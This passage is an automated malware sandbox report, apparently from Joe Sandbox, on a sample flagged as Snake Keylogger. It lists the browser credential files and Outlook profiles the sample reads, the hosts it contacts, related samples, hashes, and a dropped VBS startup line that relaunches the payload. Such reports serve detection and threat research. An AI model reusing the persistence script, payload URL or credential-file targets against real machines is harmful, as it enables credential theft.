                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ishon.exe, Queries volume information: C:\Users\user\AppData\Roaming\ishon.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ishon.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ishon.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ishon.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ishon.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ishon.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ishon.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: C:\Users\user\AppData\Roaming\ishon.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\ishon.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe, File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\AppData\Roaming\ishon.exe, File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                      Source: C:\Users\user\AppData\Roaming\ishon.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                      Remote Access Functionality

                      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                      Resource Development: Scripting (111); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                      Execution: Scheduled Task/Job (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                      Persistence: Scripting (111); DLL Side-Loading (1); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (2); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                      Privilege Escalation: DLL Side-Loading (1); Process Injection (111); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (2); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                      Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (31); Process Injection (111)
                      Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                      Discovery: File and Directory Discovery (2); System Information Discovery (13); Query Registry (1); Security Software Discovery (21); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Network Configuration Discovery (1)
                      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                      Collection: Archive Collected Data (11); Data from Local System (1); Email Collection (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                      Command and Control: Ingress Tool Transfer (1); Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (13); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                      Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
[Behavior Graph. ID: 1562379, Sample: LAQfpnQvPQ.exe, Startdate: 25/11/2024, Architecture: WINDOWS, Score: 100. Process chain shown: LAQfpnQvPQ.exe drops C:\Users\user\AppData\Roaming\ishon.exe (PE32), C:\Users\user\...\ishon.exe:Zone.Identifier and C:\Users\user\AppData\Roaming\...\ishon.vbs, contacts cia.tf (104.21.1.182) and starts a second LAQfpnQvPQ.exe instance, which contacts checkip.dyndns.com (193.122.130.0) and reallyfreegeoip.org (172.67.177.134); wscript.exe starts ishon.exe, which starts a second ishon.exe instance.]

Source | Detection | Scanner | Label | Link
LAQfpnQvPQ.exe | 55% | ReversingLabs | Win32.Spyware.Snakekeylogger |
LAQfpnQvPQ.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\ishon.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\ishon.exe | 55% | ReversingLabs | Win32.Spyware.Snakekeylogger |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
https://cia.tf/12e2f2f2315804d08baebc78b9269ad1.mp3 | 0% | Avira URL Cloud | safe |
https://cia.tf/12e2f2f2315804d08baebc78b9269ad1.mp3HI. | 0% | Avira URL Cloud | safe |
https://cia.tf | 0% | Avira URL Cloud | safe |
https://cia.tf/12e2f2f2315804d08baebc78b9269ad1.mp3HIC | 0% | Avira URL Cloud | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
cia.tf | 104.21.1.182 | true | false | | high
reallyfreegeoip.org | 172.67.177.134 | true | false | | high
checkip.dyndns.com | 193.122.130.0 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://cia.tf/12e2f2f2315804d08baebc78b9269ad1.mp3 | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/8.46.123.75 | false | | high
http://checkip.dyndns.org/ | false | | high

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.1.182 | cia.tf | United States | 13335 | CLOUDFLARENETUS | false
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
172.67.177.134 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1562379
                                                                        Start date and time:2024-11-25 14:58:08 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 7m 53s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:8
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:LAQfpnQvPQ.exe
                                                                        renamed because original name is a hash value
                                                                        Original Sample Name:b5d25a995424fd4d4fe5303ca4e90ceeb2794989f58213bda32b29c8716c5cfb.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
                                                                        EGA Information:
                                                                        • Successful, ratio: 50%
                                                                        HCA Information:
                                                                        • Successful, ratio: 97%
                                                                        • Number of executed functions: 429
                                                                        • Number of non-executed functions: 36
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target LAQfpnQvPQ.exe, PID 6364 because it is empty
                                                                        • Execution Graph export aborted for target ishon.exe, PID 6184 because it is empty
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: LAQfpnQvPQ.exe

Time | Type | Description
08:59:00 | API Interceptor | 1710733x Sleep call for process: LAQfpnQvPQ.exe modified
08:59:30 | API Interceptor | 88827x Sleep call for process: ishon.exe modified
14:59:20 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs

Match | Associated Sample Name / URL | Detection | Threat Name | Context
193.122.130.0 | November Quotation.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
 | denizbank 25.11.2024 E80 aspc.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | VSP469620.exe | malicious | Snake Keylogger | checkip.dyndns.org/
 | Shave.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | SOA SEP 2024.exe | malicious | PureLog Stealer, Snake Keylogger | checkip.dyndns.org/
 | QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger | checkip.dyndns.org/
 | PO-841122676_g787.exe | malicious | GuLoader | checkip.dyndns.org/
 | Documents.pdf.exe | malicious | MassLogger RAT | checkip.dyndns.org/
 | #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
 | e-dekont_html.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/

Match | Associated Sample Name / URL | Detection | Threat Name | Context
cia.tf | idk_1.ps1 | malicious | Unknown | 172.67.129.178
 | FreeCs2Skins.ps1 | malicious | Unknown | 172.67.129.178
 | Ref#2056119.exe | malicious | AgentTesla, XWorm | 172.67.129.178
checkip.dyndns.com | November Quotation.exe | malicious | GuLoader, MassLogger RAT | 193.122.130.0
 | #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
 | F7Xu8bRnXT.exe | malicious | MassLogger RAT, PureLog Stealer | 158.101.44.242
 | dekont 25.11.2024 PDF.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 132.226.8.169
 | AWB NO - 09804480383.exe | malicious | PureLog Stealer, Snake Keylogger | 132.226.247.73
 | denizbank 25.11.2024 E80 aspc.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 193.122.130.0
 | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe | malicious | MassLogger RAT, PureLog Stealer | 193.122.6.168
 | VSP469620.exe | malicious | Snake Keylogger | 193.122.130.0
 | order requirements CIF-TRC809910645210.exe | malicious | MassLogger RAT | 132.226.8.169
 | IMG-20241119-WA0006(162KB).Pdf.exe | malicious | Snake Keylogger | 193.122.6.168
reallyfreegeoip.org | November Quotation.exe | malicious | GuLoader, MassLogger RAT | 172.67.177.134
 | #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
 | F7Xu8bRnXT.exe | malicious | MassLogger RAT, PureLog Stealer | 172.67.177.134
                                                                        dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 172.67.177.134
                                                                        AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                        • 104.21.67.152
                                                                        denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 104.21.67.152
                                                                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                        • 172.67.177.134
                                                                        VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 104.21.67.152
                                                                        order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 104.21.67.152
                                                                        IMG-20241119-WA0006(162KB).Pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 172.67.177.134
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CLOUDFLARENETUSidk_1.ps1Get hashmaliciousUnknownBrowse
                                                                        • 172.67.129.178
                                                                        FreeCs2Skins.ps1Get hashmaliciousUnknownBrowse
                                                                        • 172.67.129.178
                                                                        Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                        • 104.26.13.205
                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                        • 172.64.41.3
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.155.47
                                                                        PO#86637.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                        • 104.26.13.205
                                                                        0Xp3q1l7De.exeGet hashmaliciousRemcosBrowse
                                                                        • 172.64.41.3
                                                                        DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                        • 104.21.24.198
                                                                        CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 104.26.12.205
                                                                        New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 172.67.74.152
                                                                        ORACLE-BMC-31898USla.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                        • 193.123.91.33
                                                                        November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • 193.122.130.0
                                                                        #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 193.122.6.168
                                                                        F7Xu8bRnXT.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                        • 158.101.44.242
                                                                        denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 193.122.130.0
                                                                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                        • 193.122.6.168
                                                                        VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 193.122.130.0
                                                                        IMG-20241119-WA0006(162KB).Pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 193.122.6.168
                                                                        Pigroots.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 158.101.44.242
                                                                        Shave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 193.122.130.0
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        54328bd36c14bd82ddaa0c04b25ed9adNovember Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • 172.67.177.134
                                                                        #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 172.67.177.134
                                                                        F7Xu8bRnXT.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                        • 172.67.177.134
                                                                        dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 172.67.177.134
                                                                        AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                        • 172.67.177.134
                                                                        denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 172.67.177.134
                                                                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                        • 172.67.177.134
                                                                        VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 172.67.177.134
                                                                        order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 172.67.177.134
                                                                        IMG-20241119-WA0006(162KB).Pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 172.67.177.134
                                                                        3b5074b1b5d032e5620f69f9f700ff0eidk_1.ps1Get hashmaliciousUnknownBrowse
                                                                        • 104.21.1.182
                                                                        FreeCs2Skins.ps1Get hashmaliciousUnknownBrowse
                                                                        • 104.21.1.182
                                                                        Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                        • 104.21.1.182
                                                                        PO#86637.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                        • 104.21.1.182
                                                                        CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 104.21.1.182
                                                                        New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 104.21.1.182
                                                                        November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • 104.21.1.182
                                                                        #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 104.21.1.182
                                                                        WNIOSEK BUD#U017bETOWY 25-11-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                        • 104.21.1.182
                                                                        dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 104.21.1.182
                                                                        No context
                                                                        Process:C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):81
                                                                        Entropy (8bit):4.742318022436999
                                                                        Encrypted:false
                                                                        SSDEEP:3:FER/n0eFHHoUkh4EaKC5dfEHHn:FER/lFHI9aZ5dfI
                                                                        MD5:C088EFFEEED32535B6399F17B834E3F5
                                                                        SHA1:ECE576AA8D642C635B7CD70B234C7F9CFFC5E425
                                                                        SHA-256:59FD91F56C166BCB30C5BD83FB3FC2225F41A2F8A41A4F224E5767B43FBC8BE2
                                                                        SHA-512:798DA8F6B3906A5C5E335CD7E07E67FE99C07E723DBA979884E28A83326DEC7CD7EB673D63AB345A7E3B06380F53FF3F88CD88D7768311BE2B8F896FA4EC1CF5
                                                                        Malicious:true
                                                                        Reputation:low
                                                                        Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\ishon.exe"""
                                                                        Process:C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):545600
                                                                        Entropy (8bit):5.127466954069092
                                                                        Encrypted:false
                                                                        SSDEEP:6144:CecUj2wJOTSYPagobSxxIxx0xxxxxxxGsrw3IX7a6plD:CecE2wGGsLV
                                                                        MD5:08565A4A256FB8F4F3497C695991829F
                                                                        SHA1:B2C4D59213108FE33197E3685B1602F56047F62C
                                                                        SHA-256:B5D25A995424FD4D4FE5303CA4E90CEEB2794989F58213BDA32B29C8716C5CFB
                                                                        SHA-512:AF2ABD0960D15C9DCB6B168318BE8EA66B357C07BC23BFC74E4C0784300863798EAD484B4B76EC802139FE9D737164DF4D5DB95B31601E715FB43003FA617799
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 55%
                                                                        Reputation:low
                                                                        Process:C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:modified
                                                                        Size (bytes):26
                                                                        Entropy (8bit):3.95006375643621
                                                                        Encrypted:false
                                                                        SSDEEP:3:ggPYV:rPYV
                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                        Malicious:true
                                                                        Reputation:high, very likely benign file
                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):5.127466954069092
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:LAQfpnQvPQ.exe
                                                                        File size:545'600 bytes
                                                                        MD5:08565a4a256fb8f4f3497c695991829f
                                                                        SHA1:b2c4d59213108fe33197e3685b1602f56047f62c
                                                                        SHA256:b5d25a995424fd4d4fe5303ca4e90ceeb2794989f58213bda32b29c8716c5cfb
                                                                        SHA512:af2abd0960d15c9dcb6b168318be8ea66b357c07bc23bfc74e4c0784300863798ead484b4b76ec802139fe9d737164df4d5db95b31601e715fb43003fa617799
                                                                        SSDEEP:6144:CecUj2wJOTSYPagobSxxIxx0xxxxxxxGsrw3IX7a6plD:CecE2wGGsLV
                                                                        TLSH:8EC45DACC2B8BCEBD41785B5DC76A5E1092BEF1894691E1A3829705325733933CB6C1F
                                                                        Icon Hash:7c64ccccd4e8f4cc
                                                                        Entrypoint:0x415d66
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:true
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x6743B67E [Sun Nov 24 23:27:58 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                        Signature Valid:false
                                                                        Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                        Error Number:-2146869232
                                                                        Not Before, Not After
                                                                        • 11/08/2021 20:00:00 10/08/2023 19:59:59
                                                                        Subject Chain
                                                                        • CN="Aicho Software Technology Co., LTD.", O="Aicho Software Technology Co., LTD.", L=\u5357\u4eac\u5e02, S=\u6c5f\u82cf\u7701, C=CN, SERIALNUMBER=91320192MA1YED3N92, OID.1.3.6.1.4.1.311.60.2.1.1=\u5357\u4eac\u7ecf\u6d4e\u6280\u672f\u5f00\u53d1\u533a, OID.1.3.6.1.4.1.311.60.2.1.2=\u6c5f\u82cf\u7701, OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization
                                                                        Version:3
                                                                        Thumbprint MD5:074C8CEBBDDB8C1AE41B66D468CC1A95
                                                                        Thumbprint SHA-1:7A4D4234CF32049903B9CDE0C0A0DA6D28398EAD
                                                                        Thumbprint SHA-256:027CC9D52DBEA32673B1D2BCD891F9E4E70EE720B6C5A6A8ACA7B6F9FB90B066
                                                                        Serial:078048AB9392D8BF9BA2B3A1B7098014
                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x15d0c | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x6f390 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x83600 | 0x1d40 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x13d6c | 0x13e00 | 74fd01d1cd2ee951fd6c2972ed737439 | False | 0.4663792256289308 | data | 6.04605122772323 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x16000 | 0x6f390 | 0x6f400 | cc554a181a5a31f43e79df154890e338 | False | 0.19252984550561797 | data | 4.661710936186697 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
